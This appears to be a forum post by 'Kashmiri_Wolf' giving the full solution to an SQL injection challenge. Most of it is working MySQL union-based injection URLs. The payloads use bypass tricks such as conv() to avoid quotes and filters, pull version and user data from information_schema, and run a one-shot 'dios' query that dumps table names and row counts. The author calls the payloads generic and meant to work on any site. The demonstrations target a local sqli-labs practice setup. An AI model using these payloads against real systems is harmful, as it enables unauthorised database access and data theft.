KashmiriWOlf Challenge 2 Solution
Kashmiri_WOlf Challenge 2 Solution
Salam Guys ... I Was Getting Too Many Requests On Closing My Challenges (About Advance Sqli) .. Some Guys Said "Don't Share Your Knowledge Like This ... It Will Be lammed" .. But I Am One Of The Greatest Lammer Ever ... And Master Ajakro Is My Inspiration ...
He Used To Share His Knowledge And People Used To Learn From It (At least 0.00001% did including me)
So I Thought "Sharing Wont Decrease My Knowledge" SO I Am Gonna Post Solutions On Some Of My Challenges
Lets Start From Challenge No 2
Here Is Link Of This Challenge
http://forum.sqliwiki.com/showthread.php?tid=4832
I Will Use Master Ajkaro's Style To Explain ThingsThere Are 4 Tasks :
A.Print Name wd version
B.User(must be like pic) and Db
C.Print Tables starting wd 'u' and not containing any 'a' word in Them From Primary Database(Also Tell How Many Such Tables Exist)
D.Print Records And Data In Tables and sort them in descending order if more than 1 (according to records)
Rules Are :
For First Task Dont use any char,hex,binary,base64(),ascii,quotes,[@@version,version(),@@GLOBAL.VERSION,@@VERSION_COMMENT](For Printing Version]
General Rules Dont Use Lpad,rpad,group_concat,NO Underscored(_) Concatenating Functions,No Variables,replace(not more than 1),You may not use any nested function for dios,repeat,insert,lpad,rpad,find_in_set,aes_decrypt/encrypt,len()
You cant use COncat More Than 3 times
Use Dios
Your Solution Should Be GEnerci(should work on every site without including waffed sites where such tables exist)
YOur Injection Should Work Without KNowing Anything About Databases/tables
First We Will Just Complete The Tasks :
Lets Start
We Have To Concatenate 4(A,B,C,D) tasks :
Our Query Will Be Like : Concat(A,B,C,D)
Lets Looks At Them Seperately
Part A :
Print Name wd version I will use localhost here
Code :
Concat
(
'Kashmiri :: ',version()
)
And Here IT is :
localhost/sqli/?id=1 union select 1,concat('Kashmiri :: ',version()),3,4,5
Ok Now Check Rules
For First Task
1.For First Task Dont use any char,hex,binary,base64(),ascii,quotes ~~> For Printing Your Name
That Means For Printing Name We Cant Use Above Mentioned Things ...
But Keep It In My Mind There Is Another Rule "Your Solution Should Be GEnerci(should work on every site without including waffed sites+where such tables exist)"
That Means Your Code Should Work For Other Sites Too ... We Will Be Using Here A Mathematical Function :
Conv(Number,from_base,to_base)
Reference(https://dev.mysql.com/) Converts numbers between different number bases. Returns a string representation of the number N, converted from base from_base to base to_base. Returns NULL if any argument is NULL. The argument N is interpreted as an integer, but may be specified as an integer or a string. The minimum base is 2 and the maximum base is 36. If from_base is a negative number, N is regarded as a signed number. Otherwise, N is treated as unsigned. CONV() works with 64-bit precision.
Code :
Concat
(
conv(N,10,32),conv(N,10,32) .. so on
)
So Our query will be like :
]localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32))),3,4,5
Proof ~~>
http://imgur.com/a/HG13S
2.[@@version,version(),@@GLOBAL.VERSION,@@VERSION_COMMENT] ~~> For Printing Version
We Know There Are Two Tables In Mysql :
global_variables
session_variables
and one is very rare :
system_variables
We All know first has usually two columns :
variable_name
variable_value
If We Dump these columns from these tables ... It Contains much necessary Info ... It ALso contains Version ... so we will print version from this table
Code :
(select
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)
Or
(select
concat
(variable_name,' :: ',variable_value)
from information_schema.session_variables
where variable_name sounds
like '%version%'
)
Lets Concatenate These Two Parts 1 and 2
concat(1,2)
Code :
localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)),3,4,5
Proof ~~> http://imgur.com/a/dI4cO
Used lower() here to print letters in lowercase
lower(string)
Part A Is Completed With All Rules Followed
Part B
User(Must be like my poc) and Db
User Is Usually root@localhost
Here task was to print asterik(*) instead of @
Lets Print User as In PoC :
We Will use Replace() function here
Replace(string,string _from_string_to_be_replaced,string_to_be_replaced_with)
Example :
Code :
repalce
(
0x24,0x24,'Kashmiri'
)
For User :
Code:
replace
(
user(),'@','*'
)
Final Code Will BE :
localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name like '%version%' limit 1,1),'
',replace
(
user(),'@','*'
),'
',database()),3,4,5
Proof ~~> http://imgur.com/a/V6WQ4
Part B is completed
Lets Move to part C
Part C :
Print Tables starting wd 'u' and not containing any 'a' word in Them From Primary Database(Also Tell How Many Such Tables Exist)
we will use searching here (Used Ajkaro's Sentence ^_^)
How Many Such Tables Exist WE will use count() first
Code :
(select
count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%'
)
Now
Printing Them (For THis We Will Use Dios)
Code :
(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,table_name)))x)
Our Final Query WIll Be :
Code :
http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name)))x)),3-- -
Proof ~~> http://imgur.com/a/1Dnan
Part C is completed
Part D :
D.Print Records And Data In Tables and sort them in descending order if more than 1 (according to records)
This Is Easy AS HEll :
Final Query :
http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name,' :: ',table_rows,' :: ',data_length)))x)),3-- -
Proof ~~> http://imgur.com/a/c3tFv
I Will Explain sorting IN Next Session Here We Had Only One table .. so i didnt sort them
Credits To ~~ > Master ajkaro,benzi,makman,khexan,rummy,cybrhckr
Regards
KASHMIRI_WOLF
Fb Link : Kashmiri_Wolf Thanks To Sqli-Basic For Letting Me Share This
No comments